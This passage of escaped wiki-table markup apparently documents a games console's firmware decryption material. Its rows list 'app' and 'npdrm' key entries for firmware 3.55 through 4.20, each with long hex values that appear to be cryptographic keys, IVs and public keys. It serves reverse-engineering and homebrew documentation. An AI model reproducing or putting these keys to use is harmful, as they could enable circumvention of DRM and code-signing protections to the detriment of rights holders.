color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.55-?&lt;/span&gt; || 0x0B || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.55++&lt;/span&gt; || dec || &lt;code&gt;A4C97402CC8A71BC7748661FE9CE7DF44DCE95D0D58938A59F47B9E9DBA7BFC3&lt;/code&gt; || &lt;code&gt;E4792F2B9DB30CB8D1596077A13FB3B5&lt;/code&gt; || &lt;code&gt;2733C889D289550FE00EAA5A47A34CEF0C1AF187610EB07BA35D2C09BB73C80B244EB4147700D1BF&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x26&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.55-?&lt;/span&gt; || 0x0C || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.55++&lt;/span&gt; || dec || &lt;code&gt;9814EFFF67B7074D1B263BF85BDC8576CE9DEC914123971B169472A1BC2387FA&lt;/code&gt; || &lt;code&gt;D43B1FA8BE15714B3078C23908BB2BCA&lt;/code&gt; || &lt;code&gt;7D1986C6BEE6CE1E0C5893BD2DF203881F40D5056761CC3F1F2E9D9A378617A2DE40BA5F09844CEB&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3D&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.55&lt;/span&gt; || 0x0B np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.55 only&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;BB31DF9A6F62C0DF853075FAA65134D9CE2240306C1731D1F7DA9B5329BD699F&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;263057225873F83940A65C8C926AC3E4&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;BC3A82A4F44C43A197070CD236FDC94FCC542D69A3E803E0AFF78D1F3DA19A79D2F61FAB5B94B437&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x23&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | npdrm || 3.55 || 0x0A np || 3.55++ || dec || &lt;code&gt;03C21AD78FBB6A3D425E9AAB1298F9FD70E29FD4E6E3A3C151205DA50C413DE4&lt;/code&gt; || &lt;code&gt;0A99D4D4F8301A88052D714AD2FB565E&lt;/code&gt; || &lt;code&gt;3995C390C9F7FBBAB124A1C14E70F9741A5E6BDF17A605D88239652C8EA7D5FC9F24B30546C1E44B&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | npdrm || 3.55-? || 0x0C np || 3.55++ || dec || &lt;code&gt;357EBBEA265FAEC271182D571C6CD2F62CFA04D325588F213DB6B2E0ED166D92&lt;/code&gt; || &lt;code&gt;D26E6DD2B74CD78E866E742E5571B84F&lt;/code&gt; || &lt;code&gt;00DCF5391618604AB42C8CFF3DC304DF45341EBA4551293E9E2B68FFE2DF527FFA3BE8329E015E57&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3A&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.56-?&lt;/span&gt; || 0x0D || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.56++&lt;/span&gt; || dec || &lt;code&gt;03B4C421E0C0DE708C0F0B71C24E3EE04306AE7383D8C5621394CCB99FF7A194&lt;/code&gt; || &lt;code&gt;5ADB9EAFE897B54CB1060D6885BE22CF&lt;/code&gt; || &lt;code&gt;71502ADB5783583AB88B2D5F23F419AF01C8B1E72FCA1E694AD49FE3266F1F9C61EFC6F29B351142&lt;/code&gt; || - || &lt;code&gt;0x12&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.56-?&lt;/span&gt; || 0x0E || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.56++&lt;/span&gt; || dec || &lt;code&gt;39A870173C226EB8A3EEE9CA6FB675E82039B2D0CCB22653BFCE4DB013BAEA03&lt;/code&gt; || &lt;code&gt;90266C98CBAA06C1BF145FF760EA1B45&lt;/code&gt; || &lt;code&gt;84DE5692809848E5ACBE25BE548F6981E3DB14735A5DDE1A0FD1F475866532B862B1AB6A004B7255&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;app&lt;/span&gt; || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.56-? || 0x0F || style=&quot;background-color:#CCFCCC; color:#330033;&quot; | &lt;span style=&quot;background-color:#CCFCCC; color:#330033;&quot;&gt;3.56++&lt;/span&gt; || dec || &lt;code&gt;FD52DFA7C6EEF5679628D12E267AA863B9365E6DB95470949CFD235B3FCA0F3B&lt;/code&gt; || &lt;code&gt;64F50296CF8CF49CD7C643572887DA0B&lt;/code&gt; || &lt;code&gt;0696D6CCBD7CF585EF5E00D547503C185D7421581BAD196E081723CD0A97FA40B2C0CD2492B0B5A1&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3A&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.56&lt;/span&gt; || 0x0E np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.56 only&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;71AA75C70A255580E4AE9BDAA0B08828C53EAA713CD0713797F143B284C1589B&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;9DED878CB6BA07121C0F50E7B172A8BF&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;387FCDAEAFF1B59CFAF79CE6215A065ACEAFFAF4048A4F217E1FF5CE67C66EC3F089DB235E52F9D3&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x29&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | npdrm || 3.56 || 0x0D np || 3.56++ || dec || &lt;code&gt;337A51416105B56E40D7CAF1B954CDAF4E7645F28379904F35F27E81CA7B6957&lt;/code&gt; || &lt;code&gt;8405C88E042280DBD794EC7E22B74002&lt;/code&gt; || &lt;code&gt;9BFF1CC7118D2393DE50D5CF44909860683411A532767BFDAC78622DB9E5456753FE422CBAFA1DA1&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x18&lt;/code&gt;<br /> |-<br /> | npdrm || 3.56 || 0x0F np || 3.56++ || dec || &lt;code&gt;135C098CBE6A3E037EBE9F2BB9B30218DDE8D68217346F9AD33203352FBB3291&lt;/code&gt; || &lt;code&gt;4070C898C2EAAD1634A288AA547A35A8&lt;/code&gt; || &lt;code&gt;BBD7CCCB556C2EF0F908DC7810FAFC37F2E56B3DAA5F7FAF53A4944AA9B841F76AB091E16B231433&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3B&lt;/code&gt;<br /> |-<br /> | app || 3.60-3.61 || 0x10 || 3.60++ || dec || &lt;code&gt;A5E51AD8F32FFBDE808972ACEE46397F2D3FE6BC823C8218EF875EE3A9B0584F&lt;/code&gt; || &lt;code&gt;7A203D5112F799979DF0E1B8B5B52AA4&lt;/code&gt; || &lt;code&gt;50597B7F680DD89F6594D9BDC0CBEE03666AB53647D0487F7F452FE2DD02694631EA755548C9E934&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x25&lt;/code&gt;<br /> |-<br /> | npdrm || 3.60-3.61 || 0x10 np || 3.60++ || dec || &lt;code&gt;4B3CD10F6A6AA7D99F9B3A660C35ADE08EF01C2C336B9E46D1BB5678B4261A61&lt;/code&gt; || &lt;code&gt;C0F2AB86E6E0457552DB50D7219371C5&lt;/code&gt; || &lt;code&gt;64A5C60BC2AD18B8A237E4AA690647E12BF7A081523FAD4F29BE89ACAC72F7AB43C74EC9AFFDA213&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | app || 3.60-3.61 || 0x11 || 3.60++ || dec || &lt;code&gt;0F8EAB8884A51D092D7250597388E3B8B75444AC138B9D36E5C7C5B8C3DF18FD&lt;/code&gt; || &lt;code&gt;97AF39C383E7EF1C98FA447C597EA8FE&lt;/code&gt; || &lt;code&gt;2FDA7A56AAEA65921C0284FF1942C6DE137370093D106034B59191951A5201B422D462F8726F852D&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x26&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.60-3.61&lt;/span&gt; || 0x11 np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;=&amp;gt;3.60&amp;nbsp;&amp;lt;=3.61&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;F5D1DBC182F5083CD4EA37C431C7DAC73882C07F232D2699B1DD9FDDF1BF4195&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;D3A7C3C91CBA014FCBCA6D5570DE13FF&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;97CA8A9781F45E557E98F176EF794FCDA6B151EB3DFD1ABA12151E00AE59957C3B15628FC8875D28&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x23&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | app || 3.60-3.61 || 0x12 || =&amp;gt;3.60&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;D127E0F7F31F2546D374E46F26A45F14016308EDB409185187AB7F0B2DEE6715&lt;/code&gt; || &lt;code&gt;25589F01B97B9BE1E07447A3CE7F06B9&lt;/code&gt; || &lt;code&gt;3C266FF46D1F526405CCCDD67EE9C7D5693B4A072C06988CAD22ADDB64439A32E2337722F51FC15B&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3D&lt;/code&gt;<br /> |-<br /> | npdrm || 3.60-3.61 || 0x12 np || =&amp;gt;3.60&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;D2F32F6E1D7A96131FAECE657008B57AAC14A9475CEF983A55E6C82CF1FCC374&lt;/code&gt; || &lt;code&gt;211B52440AB7066A53121106FEB29FD5&lt;/code&gt; || &lt;code&gt;EA2F8826D1ECA47B029B41C833615006FAF535AAD30594319EA4F767925EBAE3A3EEE32E6D29580C&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3A&lt;/code&gt;<br /> |-<br /> | npdrm || 3.65-3.66 || 0x13 np || 3.65++ || dec || &lt;code&gt;265C93CF48562EC5D18773BEB7689B8AD10C5EB6D21421455DEBC4FB128CBF46&lt;/code&gt; || &lt;code&gt;8DEA5FF959682A9B98B688CEA1EF4A1D&lt;/code&gt; || &lt;code&gt;9D8DB5A880608DC69717991AFC3AD5C0215A5EE413328C2ABC8F35589E04432373DB2E2339EEF7C8&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x18&lt;/code&gt;<br /> |-<br /> | app || 3.65-3.66 || 0x13 || 3.65++ || dec || &lt;code&gt;DBF62D76FC81C8AC92372A9D631DDC9219F152C59C4B20BFF8F96B64AB065E94&lt;/code&gt; || &lt;code&gt;CB5DD4BE8CF115FFB25801BC6086E729&lt;/code&gt; || &lt;code&gt;B26FE6D3E3A1E766FAE79A8E6A7F48998E7FC1E4B0AD8745FF54C018C2A6CC7A0DD7525FAFEA4917&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x12&lt;/code&gt;<br /> |-<br /> | app || 3.65-3.66 || 0x14 || 3.65++ || dec || &lt;code&gt;491B0D72BB21ED115950379F4564CE784A4BFAABB00E8CB71294B192B7B9F88E&lt;/code&gt; || &lt;code&gt;F98843588FED8B0E62D7DDCB6F0CECF4&lt;/code&gt; || &lt;code&gt;04275E8838EF95BD013B223C3DF674540932F21B534C7ED2944B9104D938FEB03B824DDB866AB26E&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x27&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.65-3.66&lt;/span&gt; || 0x14 np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;=&amp;gt;3.65&amp;nbsp;&amp;lt;=3.66&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;BF10F09590C0152F7EF749FF4B990122A4E8E5491DA49A2D931E72EEB990F860&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;22C19C5522F7A782AFC547C2640F5BDE&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;3233BA2B284189FB1687DF653002257A0925D8EB0C64EBBE8CC7DE87F548D107DE1FD3D1D285DB4F&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x29&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | app || 3.65-3.66 || 0x15 || =&amp;gt;3.65&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;324D2BFEDA4044604EDCA550EB7F56065C4CA91DFB2636EC78030353DC1CEFF4&lt;/code&gt; || &lt;code&gt;A37B2139FBCF62F6B41F796A594440C8&lt;/code&gt; || &lt;code&gt;A6283C12B04C37DDC6EBBF4B31E5F1B1B2602DC83EBA6362C9C1189BF25A3EF1BB3766625A4E9694&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3A&lt;/code&gt;<br /> |-<br /> | npdrm || 3.65-3.66 || 0x15 np || =&amp;gt;3.65&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;3DED5C82E18CD9F695855B1757CA91447EA34D906A66BEAAB46113F9BCE1D92F&lt;/code&gt; || &lt;code&gt;ABF2DA36D993554FB060322DC51097F7&lt;/code&gt; || &lt;code&gt;497296C62F2C489F9F0E7628887AD54715EFD1227B053C6AA4501D43FF6FB536B78315C08D786569&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x3B&lt;/code&gt;<br /> |-<br /> | app || 3.70-3.74 || 0x16 || 3.70++ || dec || &lt;code&gt;A106692224F1E91E1C4EBAD4A25FBFF66B4B13E88D878E8CD072F23CD1C5BF7C&lt;/code&gt; || &lt;code&gt;62773C70BD749269C0AFD1F12E73909E&lt;/code&gt; || &lt;code&gt;566635D3E1DCEC47243AAD1628AE6B2CEB33463FC155E4635846CE33899C5E353DDFA47FEF5694AF&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x30&lt;/code&gt;<br /> |-<br /> | npdrm || 3.70-3.74 || 0x16 np || 3.70++ || dec || &lt;code&gt;7910340483E419E55F0D33E4EA5410EEEC3AF47814667ECA2AA9D75602B14D4B&lt;/code&gt; || &lt;code&gt;4AD981431B98DFD39B6388EDAD742A8E&lt;/code&gt; || &lt;code&gt;62DFE488E410B1B6B2F559E4CB932BCB78845AB623CC59FDF65168400FD76FA82ED1DC60E091D1D1&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x25&lt;/code&gt;<br /> |-<br /> | app || 3.70-3.74 || 0x17 || 3.70++ || dec || &lt;code&gt;4E104DCE09BA878C75DA98D0B1636F0E5F058328D81419E2A3D22AB0256FDF46&lt;/code&gt; || &lt;code&gt;954A86C4629E116532304A740862EF85&lt;/code&gt; || &lt;code&gt;3B7B04C71CAE2B1199D57453C038BB1B541A05AD1B94167B0AB47A9B24CAECB9000CB21407009666&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x08&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;3.70-3.74&lt;/span&gt; || 0x17 np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;=&amp;gt;3.70&amp;nbsp;&amp;lt;=3.74&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;F11DBD2C97B32AD37E55F8E743BC821D3E67630A6784D9A058DDD26313482F0F&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;FC5FA12CA3D2D336C4B8B425D679DA55&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;19E27EE90E33EDAB16B22E688B5F704E5C6EC1062070EBF43554CD03DFDAE16D684BB8B5574DBECA&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x15&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | app || 3.70-3.74 || 0x18 || =&amp;gt;3.70&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;1F876AB252DDBCB70E74DC4A20CD8ED51E330E62490E652F862877E8D8D0F997&lt;/code&gt; || &lt;code&gt;BF8D6B1887FA88E6D85C2EDB2FBEC147&lt;/code&gt; || &lt;code&gt;64A04126D77BF6B4D686F6E8F87DD150A5B014BA922D2B694FFF4453E11239A6E0B58F1703C51494&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x11&lt;/code&gt;<br /> |-<br /> | npdrm || 3.70-3.74 || 0x18 np || =&amp;gt;3.70&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;1A4B32C927257811F777997EA9549CEFD2AE829A528F771A3EE7FEB2110E0133&lt;/code&gt; || &lt;code&gt;402666C76D795D228089810DDC128D14&lt;/code&gt; || &lt;code&gt;ABD149AB27BEE0DEC0E34BB8A8CA225E3FCF504E2DDE6A55BBD39A06CFB068CFC3CF5DF8B117EB5A&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x15&lt;/code&gt;<br /> |-<br /> | app || 4.00-4.11 || 0x19 || 4.00++ || dec || &lt;code&gt;3236B9937174DF1DC12EC2DD8A318A0EA4D3ECDEA5DFB4AC1B8278447000C297&lt;/code&gt; || &lt;code&gt;6153DEE781B8ADDC6A439498B816DC46&lt;/code&gt; || &lt;code&gt;148DCA961E2738BAF84B2D1B6E2DA2ABD6A95F2C9571E54C6922F9ED9674F062B7F1BE5BD6FA5268&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x31&lt;/code&gt;<br /> |-<br /> | npdrm || 4.00-4.11 || 0x19 np || 4.00++ || dec || &lt;code&gt;FBDA75963FE690CFF35B7AA7B408CF631744EDEF5F7931A04D58FD6A921FFDB3&lt;/code&gt; || &lt;code&gt;F72C1D80FFDA2E3BF085F4133E6D2805&lt;/code&gt; || &lt;code&gt;637EAD34E7B85C723C627E68ABDD0419914EBED4008311731DD87FDDA2DAF71F856A70E14DA17B42&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x24&lt;/code&gt;<br /> |-<br /> | app || 4.00-4.11 || 0x1A || 4.00++ || dec || &lt;code&gt;5EFD1E9961462794E3B9EF2A4D0C1F46F642AAE053B5025504130590E66F19C9&lt;/code&gt; || &lt;code&gt;1AC8FA3B3C90F8FDE639515F91B58327&lt;/code&gt; || &lt;code&gt;BE4B1B513536960618BFEF12A713F6673881B02F9DC616191E823FC8337CCF99ADAA6172019C0C23&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x17&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;npdrm&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;4.00-4.11&lt;/span&gt; || 0x1A np || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;=&amp;gt;4.00&amp;nbsp;&amp;lt;=4.11&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;751EE949CD3ADF50A469197494A1EC358409CCBE6E85217EBDE7A87D3FF1ABD8&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;23AE4ADA4D3F798DC5ED98000337FF77&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;1BABA87CD1AD705C462D4E7427B6DAF59A50383A348A15088F0EDFCF1ADF2B5C2B2D507B2A357D36&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;0x1A&lt;/code&gt;&lt;/span&gt;<br /> |-<br /> | app || 4.00-4.11 || 0x1B || =&amp;gt;4.00&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;66637570D1DEC098467DB207BAEA786861964D0964D4DBAF89E76F46955D181B&lt;/code&gt; || &lt;code&gt;9F7B5713A5ED59F6B35CD8F8A165D4B8&lt;/code&gt; || &lt;code&gt;4AB6FB1F6F0C3D9219923C1AC683137AB05DF667833CC6A5E8F590E4E28FE2EB180C7D5861117CFB&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x12&lt;/code&gt;<br /> |-<br /> | npdrm || 4.00-4.11 || 0x1B np || =&amp;gt;4.00&amp;nbsp;&amp;lt;=4.11 || dec || &lt;code&gt;BCF9BD763A7B787CF1428EF45546AF5EBB3D816ABA1C6FF2FFD3D854B71F355B&lt;/code&gt; || &lt;code&gt;D03979E47D236BD278EC7331B7DA0BD4&lt;/code&gt; || &lt;code&gt;4F30DF9F3A9D6B3AF92510F81F7961DD404F5E09BFF4D989969727509E39B94A750D12A063189848&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x17&lt;/code&gt;<br /> |-<br /> | app || 4.20-{{latest}} || 0x1C || 4.20++ || dec || &lt;code&gt;CFF025375BA0079226BE01F4A31F346D79F62CFB643CA910E16CF60BD9092752&lt;/code&gt; || &lt;code&gt;FD40664E2EBBA01BF359B0DCDF543DA4&lt;/code&gt; || &lt;code&gt;36C1ACE6DD5CCC0006FDF3424750FAC515FC5CFA2C93EC53C6EC2BC421708D154E91F2E7EA54A893&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x09&lt;/code&gt;<br /> |-<br /> | npdrm || 4.20-{{latest}} || 0x1C np || 4.20++ || dec || &lt;code&gt;8103EA9DB790578219C4CEDF0592B43064A7D98B601B6C7BC45108C4047AA80F&lt;/code&gt; || &lt;code&gt;246F4B8328BE6A2D394EDE20479247C5&lt;/code&gt; || &lt;code&gt;503172C9551308A87621ECEE90362D14889BFED2CF32B0B3E32A4F9FE527A41464B735E1ADBC6762&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x30&lt;/code&gt;<br /> |-<br /> | app || 4.20-{{latest}} || 0x1D || 4.20++ || dec || &lt;code&gt;D202174EB65A62048F3674B59EF6FE72E1872962F3E1CD658DE8D7AF71DA1F3E&lt;/code&gt; || &lt;code&gt;ACB9945914EBB7B9A31ECE320AE09F2D&lt;/code&gt; || &lt;code&gt;430322887503CF52928FAAA410FD623C7321281C8825D95F5B47EF078EFCFC44454C3AB4F00BB879&lt;/code&gt; || &lt;code&gt;&lt;/code&gt; || &lt;code&gt;0x1A&lt;/code&gt;<br /> |-<br /> | style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;seven&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;4.20-{{latest}}&lt;/span&gt; || not &quot;0x1E&quot; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;4.20++&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;dec&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span style=&quot;background-color:lightgrey;&quot;&gt;&lt;code&gt;46BD0891224E0CE13E2162921D4BB76193AEEE4416A729FCDD111C5536BF87C9&lt;/code&gt;&lt;/span&gt; || style=&quot;background-color:lightgrey;&quot; | &lt;span 